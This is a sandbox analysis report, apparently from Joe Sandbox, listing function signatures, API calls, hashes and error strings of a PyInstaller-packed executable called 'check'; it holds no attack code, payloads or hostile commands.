                                                                                                                                                                                                                • String ID: Needs to remove its temporary files.
                                                                                                                                                                                                                • API String ID: 3975851968-2863640275
                                                                                                                                                                                                                • Opcode ID: fca9629812ae98fc4dea80e51924cd1fa5b6a95a0379263e815d251d6ca0a567
                                                                                                                                                                                                                • Instruction ID: 414826e90578001c853b22eb860214c9034df1f2e9ee6efff28a0a269a36861f
                                                                                                                                                                                                                • Opcode Fuzzy Hash: fca9629812ae98fc4dea80e51924cd1fa5b6a95a0379263e815d251d6ca0a567
                                                                                                                                                                                                                • Instruction Fuzzy Hash: CB217631B19E8281E7954F7AA8441796254EFA8FB0F984131FE2EC33D5EE2CF5918201
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000004.00000002.2214920366.00007FF61E8E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF61E8E0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000004.00000002.2214831894.00007FF61E8E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215013020.00007FF61E90B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215142503.00007FF61E91E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215142503.00007FF61E922000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215315967.00007FF61E924000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_7ff61e8e0000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                • String ID: -$:$f$p$p
                                                                                                                                                                                                                • API String ID: 3215553584-2013873522
                                                                                                                                                                                                                • Opcode ID: 75ce3dd5e90789a751ac91fed3db50e3550f512a2f4dec46f6fb30c565ad9a60
                                                                                                                                                                                                                • Instruction ID: c6833b234b7d18a7a990a2109661bd28f48da67bfebdab3662692f2e0777d524
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 75ce3dd5e90789a751ac91fed3db50e3550f512a2f4dec46f6fb30c565ad9a60
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3F12B361E1CA4386FBA05A34D15427A7691FB60F78F884335F68A866C4DF3CF590AB81
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000004.00000002.2214920366.00007FF61E8E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF61E8E0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000004.00000002.2214831894.00007FF61E8E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215013020.00007FF61E90B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215142503.00007FF61E91E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215142503.00007FF61E922000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215315967.00007FF61E924000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_7ff61e8e0000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                • String ID: f$f$p$p$f
                                                                                                                                                                                                                • API String ID: 3215553584-1325933183
                                                                                                                                                                                                                • Opcode ID: efdc55b57c7b5823aa39a5abe82f144bbffe385c3037011f7a836833ec2ff017
                                                                                                                                                                                                                • Instruction ID: 3b2ece6f7149fa9a21a3c8a87529f11240214b883a3ba1d8714ea0c9568d5d4b
                                                                                                                                                                                                                • Opcode Fuzzy Hash: efdc55b57c7b5823aa39a5abe82f144bbffe385c3037011f7a836833ec2ff017
                                                                                                                                                                                                                • Instruction Fuzzy Hash: F912B761E1C94386FBA49A54E054679B6E1FBA2F70F844035F69AC7AD6DF3CF4808B00
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000004.00000002.2214920366.00007FF61E8E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF61E8E0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000004.00000002.2214831894.00007FF61E8E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215013020.00007FF61E90B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215142503.00007FF61E91E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215142503.00007FF61E922000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215315967.00007FF61E924000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_7ff61e8e0000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: CurrentProcess
                                                                                                                                                                                                                • String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
                                                                                                                                                                                                                • API String ID: 2050909247-3659356012
                                                                                                                                                                                                                • Opcode ID: 4766fd9fea8e38f8ef7433baa84d7eef3373f3bc35dc64b3497eb8d81a71ab88
                                                                                                                                                                                                                • Instruction ID: aa35d5235ee3103b7101541011e6953add6bc01bd36e8f2d0ebaeae92fd0e8fc
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4766fd9fea8e38f8ef7433baa84d7eef3373f3bc35dc64b3497eb8d81a71ab88
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7B417C21B18E5286EA90EB16A8006FA6395FF64FE4F845832FD4DC7796DE3CF9018740
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000004.00000002.2214920366.00007FF61E8E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF61E8E0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000004.00000002.2214831894.00007FF61E8E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215013020.00007FF61E90B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215142503.00007FF61E91E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215142503.00007FF61E922000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215315967.00007FF61E924000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_7ff61e8e0000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: CurrentProcess
                                                                                                                                                                                                                • String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
                                                                                                                                                                                                                • API String ID: 2050909247-3659356012
                                                                                                                                                                                                                • Opcode ID: c4a15b4578328202095984dbee273c4da1e986305321664890ae0d16d35fced4
                                                                                                                                                                                                                • Instruction ID: c8c98ee30bd090d288c7bacff53c8ac1db076e7f6115988ebde9881df91c1fbb
                                                                                                                                                                                                                • Opcode Fuzzy Hash: c4a15b4578328202095984dbee273c4da1e986305321664890ae0d16d35fced4
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 01414D31A18E429AEA50DF6294405F96390EF64FA4F844932FD5EC7B96EE3CF5428704
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000004.00000002.2214920366.00007FF61E8E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF61E8E0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000004.00000002.2214831894.00007FF61E8E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215013020.00007FF61E90B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215142503.00007FF61E91E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215142503.00007FF61E922000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215315967.00007FF61E924000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_7ff61e8e0000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                                                                                                                                                                • String ID: csm$csm$csm
                                                                                                                                                                                                                • API String ID: 849930591-393685449
                                                                                                                                                                                                                • Opcode ID: aab7c7e636ea8a2572919ef13f94062ff4905efd63cd4babadd9079b892b9703
                                                                                                                                                                                                                • Instruction ID: e357f4f2ac3da671c06218818001ac4f264300076b562059fefa86fed44b5ff9
                                                                                                                                                                                                                • Opcode Fuzzy Hash: aab7c7e636ea8a2572919ef13f94062ff4905efd63cd4babadd9079b892b9703
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 18D16F22A08F4686EBA09F66D4403AD77A0FB65BA8F100135FE8D97B95DF38F494C700
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,00007FF61E8E3706,?,00007FF61E8E3804), ref: 00007FF61E8E2C9E
                                                                                                                                                                                                                • FormatMessageW.KERNEL32(?,?,?,?,?,?,?,?,00007FF61E8E3706,?,00007FF61E8E3804), ref: 00007FF61E8E2D63
                                                                                                                                                                                                                • MessageBoxW.USER32 ref: 00007FF61E8E2D99
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000004.00000002.2214920366.00007FF61E8E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF61E8E0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000004.00000002.2214831894.00007FF61E8E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215013020.00007FF61E90B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215142503.00007FF61E91E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215142503.00007FF61E922000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215315967.00007FF61E924000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_7ff61e8e0000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Message$CurrentFormatProcess
                                                                                                                                                                                                                • String ID: %ls: $<FormatMessageW failed.>$Error$[PYI-%d:ERROR]
                                                                                                                                                                                                                • API String ID: 3940978338-251083826
                                                                                                                                                                                                                • Opcode ID: c67c27f58c2af476bbbd059d0433c12e6f67668a4e3ecf6e42cf1bc8669f0b6b
                                                                                                                                                                                                                • Instruction ID: fa2e99122a8e50dbcb897a0e844c4f7bff56a3a43d4623eaf2c89b8f6438e1cc
                                                                                                                                                                                                                • Opcode Fuzzy Hash: c67c27f58c2af476bbbd059d0433c12e6f67668a4e3ecf6e42cf1bc8669f0b6b
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6031D832B08F5146E660AB26A8102AA6695BF94FA8F410135FF4ED3759EF3CE506C300
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • LoadLibraryExW.KERNEL32(?,?,?,00007FF61E8EDF7A,?,?,?,00007FF61E8EDC6C,?,?,?,00007FF61E8ED869), ref: 00007FF61E8EDD4D
                                                                                                                                                                                                                • GetLastError.KERNEL32(?,?,?,00007FF61E8EDF7A,?,?,?,00007FF61E8EDC6C,?,?,?,00007FF61E8ED869), ref: 00007FF61E8EDD5B
                                                                                                                                                                                                                • LoadLibraryExW.KERNEL32(?,?,?,00007FF61E8EDF7A,?,?,?,00007FF61E8EDC6C,?,?,?,00007FF61E8ED869), ref: 00007FF61E8EDD85
                                                                                                                                                                                                                • FreeLibrary.KERNEL32(?,?,?,00007FF61E8EDF7A,?,?,?,00007FF61E8EDC6C,?,?,?,00007FF61E8ED869), ref: 00007FF61E8EDDF3
                                                                                                                                                                                                                • GetProcAddress.KERNEL32(?,?,?,00007FF61E8EDF7A,?,?,?,00007FF61E8EDC6C,?,?,?,00007FF61E8ED869), ref: 00007FF61E8EDDFF
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000004.00000002.2214920366.00007FF61E8E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF61E8E0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000004.00000002.2214831894.00007FF61E8E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215013020.00007FF61E90B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215142503.00007FF61E91E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215142503.00007FF61E922000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215315967.00007FF61E924000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_7ff61e8e0000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Library$Load$AddressErrorFreeLastProc
                                                                                                                                                                                                                • String ID: api-ms-
                                                                                                                                                                                                                • API String ID: 2559590344-2084034818
                                                                                                                                                                                                                • Opcode ID: 276526191d17588ee9fa22b972cdf0953455baf5c8a53fb276b347519b5968a9
                                                                                                                                                                                                                • Instruction ID: 428c87f2d6f4963c35cb62adf3cd5f56d20136996b99c06561556554273a86b5
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 276526191d17588ee9fa22b972cdf0953455baf5c8a53fb276b347519b5968a9
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5E31A321B1AE4292EE929F1B94005B523A8FF68FB4F594935FD1D863C5EF3CF4498200
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000004.00000002.2214920366.00007FF61E8E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF61E8E0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000004.00000002.2214831894.00007FF61E8E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215013020.00007FF61E90B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215142503.00007FF61E91E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215142503.00007FF61E922000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215315967.00007FF61E924000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_7ff61e8e0000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: CurrentProcess
                                                                                                                                                                                                                • String ID: Failed to load Python DLL '%ls'.$LoadLibrary$Path of Python shared library (%s) and its name (%s) exceed buffer size (%d)$Path of ucrtbase.dll (%s) and its name exceed buffer size (%d)$Reported length (%d) of Python shared library name (%s) exceeds buffer size (%d)$ucrtbase.dll
                                                                                                                                                                                                                • API String ID: 2050909247-2434346643
                                                                                                                                                                                                                • Opcode ID: bd35b640c02035bc0e077a05b147b005ab0e639f37cafda848bc65a29b3ec2f1
                                                                                                                                                                                                                • Instruction ID: 73bc6756ef7c27ec5330407b9903e627d3d9bd1b69bee4bc2630bc8756dff2a9
                                                                                                                                                                                                                • Opcode Fuzzy Hash: bd35b640c02035bc0e077a05b147b005ab0e639f37cafda848bc65a29b3ec2f1
                                                                                                                                                                                                                • Instruction Fuzzy Hash: A741A131A18F8791EA65DB26E4142E96325FF64B64F800532FA5CC3296EF3CF509C340
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetCurrentProcessId.KERNEL32(00000000,?,?,?,00000000,00007FF61E8E351A,?,00000000,00007FF61E8E3F23), ref: 00007FF61E8E2AA0
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000004.00000002.2214920366.00007FF61E8E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF61E8E0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000004.00000002.2214831894.00007FF61E8E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215013020.00007FF61E90B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215142503.00007FF61E91E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215142503.00007FF61E922000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215315967.00007FF61E924000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_7ff61e8e0000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: CurrentProcess
                                                                                                                                                                                                                • String ID: 0$WARNING$Warning$Warning [ANSI Fallback]$[PYI-%d:%s]
                                                                                                                                                                                                                • API String ID: 2050909247-2900015858
                                                                                                                                                                                                                • Opcode ID: d3ff72078d09a899d0ca032b5bdbc8691629937d026b54217f09319e947088a3
                                                                                                                                                                                                                • Instruction ID: 0abfa030d19f1f25910c9b757e98cacb4a86df403be52b05998d9df7bfd2d12f
                                                                                                                                                                                                                • Opcode Fuzzy Hash: d3ff72078d09a899d0ca032b5bdbc8691629937d026b54217f09319e947088a3
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4921A332A18F8142E7609B55B4417EA6394FB98B90F400136FE8DD3659DF3CE1458740
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000004.00000002.2214920366.00007FF61E8E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF61E8E0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000004.00000002.2214831894.00007FF61E8E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215013020.00007FF61E90B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215142503.00007FF61E91E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215142503.00007FF61E922000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215315967.00007FF61E924000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_7ff61e8e0000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Value$ErrorLast
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 2506987500-0
                                                                                                                                                                                                                • Opcode ID: a42b9cf7ed1ffe71ebcf97f5a72f2c90d2921d4b6bb9ef7954fc9d2fe8c6feaf
                                                                                                                                                                                                                • Instruction ID: 4ffdb047ee545bc983998c7da88c51a8652686db8caac3fa8cc522279c9d6012
                                                                                                                                                                                                                • Opcode Fuzzy Hash: a42b9cf7ed1ffe71ebcf97f5a72f2c90d2921d4b6bb9ef7954fc9d2fe8c6feaf
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 17213E20F0CE4281FAE8A7659A5517962565FA4FB0F144A34F93EC7AC6EE2CF8808341
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000004.00000002.2214920366.00007FF61E8E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF61E8E0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000004.00000002.2214831894.00007FF61E8E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215013020.00007FF61E90B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215142503.00007FF61E91E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215142503.00007FF61E922000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215315967.00007FF61E924000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_7ff61e8e0000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                                                                                                                                                                                • String ID: CONOUT$
                                                                                                                                                                                                                • API String ID: 3230265001-3130406586
                                                                                                                                                                                                                • Opcode ID: 3755c2f75cb97972cd4ab37a7e27d28fd0bf6f95a56d27d10542fc75f089f0eb
                                                                                                                                                                                                                • Instruction ID: 18a4f83a0f1adfcb3a149df2d7f1e7ad85fe4b95f87a7e52db1f88b8beed7357
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3755c2f75cb97972cd4ab37a7e27d28fd0bf6f95a56d27d10542fc75f089f0eb
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 72118131A18E4186E7609B56E85432962B8FBA8FF4F400A34FA5EC77A5DF3CE8148740
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetCurrentProcess.KERNEL32(?,FFFFFFFF,00000000,00007FF61E8E3FB1), ref: 00007FF61E8E8EFD
                                                                                                                                                                                                                • K32EnumProcessModules.KERNEL32(?,FFFFFFFF,00000000,00007FF61E8E3FB1), ref: 00007FF61E8E8F5A
                                                                                                                                                                                                                  • Part of subcall function 00007FF61E8E9390: MultiByteToWideChar.KERNEL32(?,?,?,00007FF61E8E45F4,00000000,00007FF61E8E1985), ref: 00007FF61E8E93C9
                                                                                                                                                                                                                • K32GetModuleFileNameExW.KERNEL32(?,FFFFFFFF,00000000,00007FF61E8E3FB1), ref: 00007FF61E8E8FE5
                                                                                                                                                                                                                • K32GetModuleFileNameExW.KERNEL32(?,FFFFFFFF,00000000,00007FF61E8E3FB1), ref: 00007FF61E8E9044
                                                                                                                                                                                                                • FreeLibrary.KERNEL32(?,FFFFFFFF,00000000,00007FF61E8E3FB1), ref: 00007FF61E8E9055
                                                                                                                                                                                                                • FreeLibrary.KERNEL32(?,FFFFFFFF,00000000,00007FF61E8E3FB1), ref: 00007FF61E8E906A
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000004.00000002.2214920366.00007FF61E8E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF61E8E0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000004.00000002.2214831894.00007FF61E8E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215013020.00007FF61E90B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215142503.00007FF61E91E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215142503.00007FF61E922000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215315967.00007FF61E924000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_7ff61e8e0000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: FileFreeLibraryModuleNameProcess$ByteCharCurrentEnumModulesMultiWide
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 3462794448-0
                                                                                                                                                                                                                • Opcode ID: 0184f5a771bb2c28f933eba3e4018dda16e38d059dd6d010c17659477659ba58
                                                                                                                                                                                                                • Instruction ID: 0ea5a994fb0d71004f1797bf37c271c802fba3dbbfa10c2acd8ea9ce74055a1e
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0184f5a771bb2c28f933eba3e4018dda16e38d059dd6d010c17659477659ba58
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 96418462A19E8281EAB09B13A5402BA7394FBA5FE4F494135EF5D97789DE7CF500C700
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetLastError.KERNEL32(?,?,?,00007FF61E8F4F11,?,?,?,?,00007FF61E8FA48A,?,?,?,?,00007FF61E8F718F), ref: 00007FF61E8FB2D7
                                                                                                                                                                                                                • FlsSetValue.KERNEL32(?,?,?,00007FF61E8F4F11,?,?,?,?,00007FF61E8FA48A,?,?,?,?,00007FF61E8F718F), ref: 00007FF61E8FB30D
                                                                                                                                                                                                                • FlsSetValue.KERNEL32(?,?,?,00007FF61E8F4F11,?,?,?,?,00007FF61E8FA48A,?,?,?,?,00007FF61E8F718F), ref: 00007FF61E8FB33A
                                                                                                                                                                                                                • FlsSetValue.KERNEL32(?,?,?,00007FF61E8F4F11,?,?,?,?,00007FF61E8FA48A,?,?,?,?,00007FF61E8F718F), ref: 00007FF61E8FB34B
                                                                                                                                                                                                                • FlsSetValue.KERNEL32(?,?,?,00007FF61E8F4F11,?,?,?,?,00007FF61E8FA48A,?,?,?,?,00007FF61E8F718F), ref: 00007FF61E8FB35C
                                                                                                                                                                                                                • SetLastError.KERNEL32(?,?,?,00007FF61E8F4F11,?,?,?,?,00007FF61E8FA48A,?,?,?,?,00007FF61E8F718F), ref: 00007FF61E8FB377
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000004.00000002.2214920366.00007FF61E8E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF61E8E0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000004.00000002.2214831894.00007FF61E8E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215013020.00007FF61E90B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215142503.00007FF61E91E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215142503.00007FF61E922000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215315967.00007FF61E924000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_7ff61e8e0000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Value$ErrorLast
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 2506987500-0
                                                                                                                                                                                                                • Opcode ID: 1c08c83365d44066401784e1b70b71c7670d14ff4fb682678828c33d1612b477
                                                                                                                                                                                                                • Instruction ID: 5d0764f6d5f58c9533ce8d0120df1cf4781c624e6aa7ecf6a259c5d1a7bf7799
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1c08c83365d44066401784e1b70b71c7670d14ff4fb682678828c33d1612b477
                                                                                                                                                                                                                • Instruction Fuzzy Hash: B4115C20F4CE4282FA98A761965517D62969FA4FB0F144734F83FC76E6EE2CF8414301
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetCurrentProcessId.KERNEL32(?,?,?,?,00000000,00000000,?,00000000,00007FF61E8E1B6A), ref: 00007FF61E8E295E
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
